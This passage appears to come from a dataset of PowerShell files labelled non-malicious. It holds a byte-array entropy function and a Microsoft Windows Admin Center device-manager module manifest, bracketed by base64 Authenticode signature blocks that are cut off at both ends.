JPgzqIivdG30Us6MqISeMYIEFjCCBBICAQEwYjBOMQswCQYDVQQGEwJVUzEWMBQG # A1UEChMNRW50cnVzdCwgSW5jLjEnMCUGA1UEAxMeRW50cnVzdCBUaW1lIFN0YW1w # aW5nIENBIC0gVFMyAhBbcCbMlvZ4GruF9hH1bbtuMAsGCWCGSAFlAwQCA6CCAYkw # GgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEEMBwGCSqGSIb3DQEJBTEPFw0yNDA0 # MTgwNzMyNDlaMCkGCSqGSIb3DQEJNDEcMBowCwYJYIZIAWUDBAIDoQsGCSqGSIb3 # DQEBDTBPBgkqhkiG9w0BCQQxQgRA72bZKcnEvqjE2/F+qoWI7S57vMQhPJmd0Xai # QQPVz8cBsgJgK2Ca8VB+wcxsf/u/imgdZ3gM1WF397N3qY8kAzCB0AYLKoZIhvcN # AQkQAi8xgcAwgb0wgbowgbcwCwYJYIZIAWUDBAIDBEA5EUIuFwI+qpkkmXQODsjo # 0nLTVfxc9mz5EVavl1U05ICv07x8TFtX79H/vNt1FGXg1AVahU6bETnZ9+xV1f4k # MGYwUqRQME4xCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1FbnRydXN0LCBJbmMuMScw # JQYDVQQDEx5FbnRydXN0IFRpbWUgU3RhbXBpbmcgQ0EgLSBUUzICEFtwJsyW9nga # u4X2EfVtu24wCwYJKoZIhvcNAQENBIICAIBW0fXjstmtnviyNwyMuyb4e2RgtiYn # PP0/WVYLjOk9GmmDHMWepbnpjkiMrKN9VgXXHhAWNJ+L69ylsqiCaO+g5rfnXmN9 # VvcglJTT/VYzxo/9DQLpiZljCQ+B0lR7r7eAmuf5m5cAHCMOThNqXvVQO8Y740Dp # arXeUPZQ7UxDKxuiR2GLm+/Unnz18B6qZcscWcTJ1rNz6JPUm4uwXEZ6XBYGgupV # lV8S0p7kIajM6vBW8XzHMNyBjsS4z+t++UH9tZdbtLfdYwxLh6v9/fQ5kcQC/wnZ # /VfM1IfGQyA/r6anjFFntC6E12/ZibtOPw96lia9jEQde5Fh4dU+vMyOTG0Iq0+Y # 8qKlHDetFgUJ6S8Wwcm/p9REVW2FLLB5q6tV++XWqUmvg1Kgrhr+I91E3ytEoLDI # 3M1rfZJrv61kQXpvmEZKV44v70GYpN37V+sI9ZsxafjTftNWqfNG1iyfiPncpbqr # Z9XZnQN258aL0wAJ6Bi7cLCBfVulfnJv8o7Ap4YITHY4SitxTyP48dkpDjvnef88 # gCzpHfHM7eXipozgzATf/QdHiKdxDCAAcheQMxJjMEqg/eX1LWhX09UtfFaOU7XT # k9TZgKs4h/0HcSdExG69rh4XeVSyO84UelZmPcIFFadLTL19dTVL5dA0n3mipSC5 # AoyUnlKJpFZE # SIG # End signature block
combined_dataset/train/non-malicious/Get-Entropy_2.ps1
Get-Entropy_2.ps1
function Get-Entropy { <# .SYNOPSIS Calculate the entropy of a byte array. Author: Matthew Graeber (@mattifestation) .PARAMETER ByteArray Specifies the byte array containing the data from which entropy will be calculated. .EXAMPLE C:\\PS> $RandArray = New-Object Byte[](10000) C:\\PS> foreach ($Offset in 0..9999) { $RandArray[$Offset] = [Byte] (Get-Random -Min 0 -Max 256) } C:\\PS> $RandArray | Get-Entropy Description ----------- Calculates the entropy of a large array containing random bytes. .EXAMPLE C:\\PS> 0..255 | Get-Entropy Description ----------- Calculates the entropy of 0-255. This should equal exactly 8. .INPUTS System.Byte[] Get-Entropy accepts a byte array from the pipeline .OUTPUTS System.Double Get-Entropy outputs a double representing the entropy of the byte array. .LINK http://www.exploit-monday.com #> [CmdletBinding()] Param ( [Parameter(Mandatory = $True, Position = 0, ValueFromPipeline = $True)] [Byte[]] $ByteArray ) BEGIN { $FrequencyTable = @{} $ByteArrayLength = 0 } PROCESS { foreach ($Byte in $ByteArray) { $FrequencyTable[$Byte]++ $ByteArrayLength++ } } END { $Entropy = 0.0 foreach ($Byte in 0..255) { $ByteProbability = ([Double] $FrequencyTable[[Byte]$Byte]) / $ByteArrayLength if ($ByteProbability -gt 0) { $Entropy += -$ByteProbability * [Math]::Log($ByteProbability, 2) } } Write-Output $Entropy } }
combined_dataset/train/non-malicious/sample_16_43.ps1
sample_16_43.ps1
# # Module manifest for module 'Microsoft.SME.DeviceManager' # @{ # Script module or binary module file associated with this manifest. RootModule = 'Microsoft.SME.DeviceManager.psm1' # Version number of this module. ModuleVersion = '4.10.2' # Supported PSEditions # CompatiblePSEditions = @() # ID used to uniquely identify this module GUID = '851f776c-6ac3-4e02-8cf5-9d255abafdce' # Author of this module Author = 'SME' # Company or vendor of this module CompanyName = 'Microsoft' # Copyright statement for this module Copyright = '(c) 2018 Microsoft. All rights reserved.' # Description of the functionality provided by this module # Description = '' # Minimum version of the Windows PowerShell engine required by this module PowerShellVersion = '5.0' # Name of the Windows PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the Windows PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # CLRVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module # RequiredModules = @() # Assemblies that must be loaded prior to importing this module # RequiredAssemblies = @() # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = @( 'Disable-WACDMCimPnpEntity', 'Enable-WACDMCimPnpEntity', 'Find-WACDMDeviceDrivers', 'Get-WACDMCimClassPnpEntity', 'Get-WACDMCimPnpEntity', 'Get-WACDMCimPnpEntityDeviceProperties', 'Get-WACDMCimPnpEntityForDevice', 'Get-WACDMCimPnpSignedDriver', 'Get-WACDMDeviceDriverInformation', 'Install-WACDMDeviceDriver', 'Set-WACDMDeviceState', 'Update-WACDMDeviceDriver', 'Add-WACDMFolderShare', 'Add-WACDMFolderShareNameUser', 'Add-WACDMFolderShareUser', 'Compress-WACDMArchiveFileSystemEntity', 'Disable-WACDMKdcProxy', 'Disable-WACDMSmbOverQuic', 'Edit-WACDMFolderShareInheritanceFlag', 'Edit-WACDMFolderShareUser', 'Edit-WACDMSmbFileShare', 'Edit-WACDMSmbServerCertificateMapping', 'Enable-WACDMSmbOverQuic', 'Expand-WACDMArchiveFileSystemEntity', 'Get-WACDMBestHostNode', 'Get-WACDMCertificates', 'Get-WACDMCimWin32LogicalDisk', 'Get-WACDMCimWin32NetworkAdapter', 'Get-WACDMCimWin32PhysicalMemory', 'Get-WACDMCimWin32Processor', 'Get-WACDMClusterInventory', 'Get-WACDMClusterNodes', 'Get-WACDMComputerName', 'Get-WACDMDecryptedDataFromNode', 'Get-WACDMEncryptionJWKOnNode', 'Get-WACDMFileNamesInPath', 'Get-WACDMFileSystemEntities', 'Get-WACDMFileSystemRoot', 'Get-WACDMFolderItemCount', 'Get-WACDMFolderOwner', 'Get-WACDMFolderShareNames', 'Get-WACDMFolderSharePath', 'Get-WACDMFolderShareStatus', 'Get-WACDMFolderShareUsers', 'Get-WACDMIsAzureTurbineServer', 'Get-WACDMItemProperties', 'Get-WACDMItemType', 'Get-WACDMLocalGroups', 'Get-WACDMLocalUsers', 'Get-WACDMOSDetails', 'Get-WACDMServerInventory', 'Get-WACDMShareEntities', 'Get-WACDMSmb1InstallationStatus', 'Get-WACDMSmbFileShareDetails', 'Get-WACDMSmbOverQuicSettings', 'Get-WACDMSmbServerCertificateHealth', 'Get-WACDMSmbServerCertificateMapping', 'Get-WACDMSmbServerCertificateValues', 'Get-WACDMSmbServerSettings', 'Get-WACDMSmbShareAccess', 'Get-WACDMStorageFileShare', 'Get-WACDMTempFolderPath', 'Move-WACDMFile', 'New-WACDMFile', 'New-WACDMFolder', 'New-WACDMSmbFileShare', 'Remove-WACDMAllShareNames', 'Remove-WACDMFileSystemEntity', 'Remove-WACDMFolderShareUser', 'Remove-WACDMSmbServerCertificateMapping', 'Remove-WACDMSmbShare', 'Rename-WACDMFileSystemEntity', 'Restore-WACDMConfigureSmbServerCertificateMapping', 'Set-WACDMSmbOverQuicServerSettings', 'Set-WACDMSmbServerCertificateMapping', 'Set-WACDMSmbServerSettings', 'Test-WACDMFileSystemEntity', 'Uninstall-WACDMSmb1' ) # Function attributes: {"localScripts":["Disable-WACDMCimPnpEntity","Enable-WACDMCimPnpEntity","Find-WACDMDeviceDrivers","Get-WACDMCimClassPnpEntity","Get-WACDMCimPnpEntity","Get-WACDMCimPnpEntityDeviceProperties","Get-WACDMCimPnpEntityForDevice","Get-WACDMCimPnpSignedDriver","Get-WACDMDeviceDriverInformation","Install-WACDMDeviceDriver","Set-WACDMDeviceState","Update-WACDMDeviceDriver"],"externalScripts":["Add-WACDMFolderShare","Add-WACDMFolderShareNameUser","Add-WACDMFolderShareUser","Compress-WACDMArchiveFileSystemEntity","Disable-WACDMKdcProxy","Disable-WACDMSmbOverQuic","Edit-WACDMFolderShareInheritanceFlag","Edit-WACDMFolderShareUser","Edit-WACDMSmbFileShare","Edit-WACDMSmbServerCertificateMapping","Enable-WACDMSmbOverQuic","Expand-WACDMArchiveFileSystemEntity","Get-WACDMBestHostNode","Get-WACDMCertificates","Get-WACDMCimWin32LogicalDisk","Get-WACDMCimWin32NetworkAdapter","Get-WACDMCimWin32PhysicalMemory","Get-WACDMCimWin32Processor","Get-WACDMClusterInventory","Get-WACDMClusterNodes","Get-WACDMComputerName","Get-WACDMDecryptedDataFromNode","Get-WACDMEncryptionJWKOnNode","Get-WACDMFileNamesInPath","Get-WACDMFileSystemEntities","Get-WACDMFileSystemRoot","Get-WACDMFolderItemCount","Get-WACDMFolderOwner","Get-WACDMFolderShareNames","Get-WACDMFolderSharePath","Get-WACDMFolderShareStatus","Get-WACDMFolderShareUsers","Get-WACDMIsAzureTurbineServer","Get-WACDMItemProperties","Get-WACDMItemType","Get-WACDMLocalGroups","Get-WACDMLocalUsers","Get-WACDMOSDetails","Get-WACDMServerInventory","Get-WACDMShareEntities","Get-WACDMSmb1InstallationStatus","Get-WACDMSmbFileShareDetails","Get-WACDMSmbOverQuicSettings","Get-WACDMSmbServerCertificateHealth","Get-WACDMSmbServerCertificateMapping","Get-WACDMSmbServerCertificateValues","Get-WACDMSmbServerSettings","Get-WACDMSmbShareAccess","Get-WACDMStorageFileShare","Get-WACDMTempFolderPath","Move-WACDMFile","New-WACDMFile","New-WACDMFolder","New-WACDMSmbFileShare","Remove-WACDMAllShareNames","Remove-WACDMFileSystemEntity","Remove-WACDMFolderShareUser","Remove-WACDMSmbServerCertificateMapping","Remove-WACDMSmbShare","Rename-WACDMFileSystemEntity","Restore-WACDMConfigureSmbServerCertificateMapping","Set-WACDMSmbOverQuicServerSettings","Set-WACDMSmbServerCertificateMapping","Set-WACDMSmbServerSettings","Test-WACDMFileSystemEntity","Uninstall-WACDMSmb1"]} # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = @() # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = @() # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. # Tags = @() # A URL to the license for this module. # LicenseUri = '' # A URL to the main website for this project. # ProjectUri = '' # A URL to an icon representing this module. # IconUri = '' # ReleaseNotes of this module # ReleaseNotes = '' } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' } # SIG # Begin signature block # MIInzgYJKoZIhvcNAQcCoIInvzCCJ7sCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAJ3faH9HJMW9Dy # IjzuJ60lDBuRrKbxyNVioFU3LBxL2qCCDYUwggYDMIID66ADAgECAhMzAAADri01 # UchTj1UdAAAAAAOuMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwODU5WhcNMjQxMTE0MTkwODU5WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQD0IPymNjfDEKg+YyE6SjDvJwKW1+pieqTjAY0CnOHZ1Nj5irGjNZPMlQ4HfxXG # yAVCZcEWE4x2sZgam872R1s0+TAelOtbqFmoW4suJHAYoTHhkznNVKpscm5fZ899 # QnReZv5WtWwbD8HAFXbPPStW2JKCqPcZ54Y6wbuWV9bKtKPImqbkMcTejTgEAj82 # 6GQc6/Th66Koka8cUIvz59e/IP04DGrh9wkq2jIFvQ8EDegw1B4KyJTIs76+hmpV # M5SwBZjRs3liOQrierkNVo11WuujB3kBf2CbPoP9MlOyyezqkMIbTRj4OHeKlamd # WaSFhwHLJRIQpfc8sLwOSIBBAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQUhx/vdKmXhwc4WiWXbsf0I53h8T8w # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMTgzNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AGrJYDUS7s8o0yNprGXRXuAnRcHKxSjFmW4wclcUTYsQZkhnbMwthWM6cAYb/h2W # 5GNKtlmj/y/CThe3y/o0EH2h+jwfU/9eJ0fK1ZO/2WD0xi777qU+a7l8KjMPdwjY # 0tk9bYEGEZfYPRHy1AGPQVuZlG4i5ymJDsMrcIcqV8pxzsw/yk/O4y/nlOjHz4oV # APU0br5t9tgD8E08GSDi3I6H57Ftod9w26h0MlQiOr10Xqhr5iPLS7SlQwj8HW37 # ybqsmjQpKhmWul6xiXSNGGm36GarHy4Q1egYlxhlUnk3ZKSr3QtWIo1GGL03hT57 # xzjL25fKiZQX/q+II8nuG5M0Qmjvl6Egltr4hZ3e3FQRzRHfLoNPq3ELpxbWdH8t # Nuj0j/x9Crnfwbki8n57mJKI5JVWRWTSLmbTcDDLkTZlJLg9V1BIJwXGY3i2kR9i # 5HsADL8YlW0gMWVSlKB1eiSlK6LmFi0rVH16dde+j5T/EaQtFz6qngN7d1lvO7uk # 6rtX+MLKG4LDRsQgBTi6sIYiKntMjoYFHMPvI/OMUip5ljtLitVbkFGfagSqmbxK # 7rJMhC8wiTzHanBg1Rrbff1niBbnFbbV4UDmYumjs1FIpFCazk6AADXxoKCo5TsO # zSHqr9gHgGYQC2hMyX9MGLIpowYCURx3L7kUiGbOiMwaMIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAOuLTVRyFOPVR0AAAAA # A64wDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIIQ1 # RavRjnnXVmaT5ycsuMeRzaHdANgqB1QljYapuDyVMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAzOefbFMEqheMExeTx+V68YNw1nSHO/pfrbRz # il7Z/Gy7SaukJSIVRuuf/gQphdFxJl94/l1+gvUj0ifw9ffNB7Ei7bPSUx1DJsIg # nKqpP7eogpYKbbpqlDQW/9BK4of0Zlz6I/hNSvWPfBmGcjbknCkjB9y4f6jupnDY # JMjaCaxCBXbMXZZNdIdIpOGpKlxFxrYMiZCIS57fALE3zrqvI5s1LVMjSQdvlIjC # /Zba2+Qvtq+NB4Q2M8tRzC80s6Gz0GVrL4V/IeEuU8HMvj/e+Bofbwd37EBRJl6k # Cxqjc0u9VF43mHVfb311xRtuUtUF6MfE2VW7z70aQ8CS8/gFFqGCFykwghclBgor # BgEEAYI3AwMBMYIXFTCCFxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFZBgsqhkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCB/xDukyeKpGZzXMh+WR92enUL+hM+WcFPQ # BLpVVIZPhQIGZa6fajuXGBMyMDI0MDEzMDE4NDI1Mi4zOTRaMASAAgH0oIHYpIHV # MIHSMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsT # HVRoYWxlcyBUU1MgRVNOOjE3OUUtNEJCMC04MjQ2MSUwIwYDVQQDExxNaWNyb3Nv # ZnQgVGltZS1TdGFtcCBTZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHg1Pwf # ExUffl0AAQAAAeAwDQYJKoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAg # UENBIDIwMTAwHhcNMjMxMDEyMTkwNzE5WhcNMjUwMTEwMTkwNzE5WjCB0jELMAkG # A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQx # HjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9z # b2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMg # VFNTIEVTTjoxNzlFLTRCQjAtODI0NjElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUt # U3RhbXAgU2VydmljZTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKyH # nPOhxbvRATnGjb/6fuBhh3ZLzotAxAgdLaZ/zkRFUdeSKzyNt3tqorMK7GDvcXdK # s+qIMUbvenlH+w53ssPa6rYP760ZuFrABrfserf0kFayNXVzwT7jarJOEjnFMBp+ # yi+uwQ2TnJuxczceG5FDHrII6sF6F879lP6ydY0BBZkZ9t39e/svNRieA5gUnv/Y # cM/bIMY/QYmd9F0B+ebFYi+PH4AkXahNkFgK85OIaRrDGvhnxOa/5zGL7Oiii7+J # 9/QHkdJGlfnRfbQ3QXM/5/umBOKG4JoFY1niZ5RVH5PT0+uCjwcqhTbnvUtfK+N+ # yB2b9rEZvp2Tv4ZwYzEd9A9VsYMuZiCSbaFMk77LwVbklpnw4aHWJXJkEYmJvxRb # cThE8FQyOoVkSuKc5OWZ2+WM/j50oblA0tCU53AauvUOZRoQBh89nHK+m5pOXKXd # YMJ+ceuLYF8h5y/cXLQMOmqLJz5l7MLqGwU0zHV+MEO8L1Fo2zEEQ4iL4BX8YknK # XonHGQacSCaLZot2kyJVRsFSxn0PlPvHVp0YdsCMzdeiw9jAZ7K9s1WxsZGEBrK/ # obipX6uxjEpyUA9mbVPljlb3R4MWI0E2xI/NM6F4Ac8Ceax3YWLT+aWCZeqiIMLx # yyWZg+i1KY8ZEzMeNTKCEI5wF1wxqr6T1/MQo+8tAgMBAAGjggFJMIIBRTAdBgNV # HQ4EFgQUcF4XP26dV+8SusoA1XXQ2TDSmdIwHwYDVR0jBBgwFoAUn6cVXQBeYl2D # 9OXSZacbUzUZ6XIwXwYDVR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3Nv # ZnQuY29tL3BraW9wcy9jcmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy # MDIwMTAoMSkuY3JsMGwGCCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1l # LVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUB # Af8EDDAKBggrBgEFBQcDCDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQAD # ggIBAMATzg6R/A0ldO7MqGxD1VJji5yVA1hHb0Hc0Yjtv7WkxQ8iwfflulX5Us64 # tD3+3NT1JkphWzaAWf2wKdAw35RxtQG1iON3HEZ0X23nde4Kg/Wfbx5rEHkZ9bzK # nR/2N5A16+w/1pbwJzdfRcnJT3cLyawr/kYjMWd63OP0Glq70ua4WUE/Po5pU7rQ # RbWEoQozY24hAqOcwuRcm6Cb0JBeTOCeRBntEKgjKep4pRaQt7b9vusT97WeJcfa # VosmmPtsZsawgnpIjbBa55tHfuk0vDkZtbIXjU4mr5dns9dnanBdBS2PY3N3hIfC # PEOszquwHLkfkFZ/9bxw8/eRJldtoukHo16afE/AqP/smmGJh5ZR0pmgW6QcX+61 # rdi5kDJTzCFaoMyYzUS0SEbyrDZ/p2KOuKAYNngljiOlllct0uJVz2agfczGjjsK # i2AS1WaXvOhgZNmGw42SFB1qaloa8Kaux9Q2HHLE8gee/5rgOnx9zSbfVUc7IcRN # odq6R7v+Rz+P6XKtOgyCqW/+rhPmp/n7Fq2BGTRkcy//hmS32p6qyglr2K4OoJDJ # XxFs6lwc8D86qlUeGjUyo7hVy5VvyA+y0mGnEAuA85tsOcUPlzwWF5sv+B5fz35O # W3X4Spk5SiNulnLFRPM5XCsSHqvcbC8R3qwj2w1evPhZxDuNMIIHcTCCBVmgAwIB # AgITMwAAABXF52ueAptJmQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UE # BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc # BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0 # IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1 # WhcNMzAwOTMwMTgzMjI1WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu # 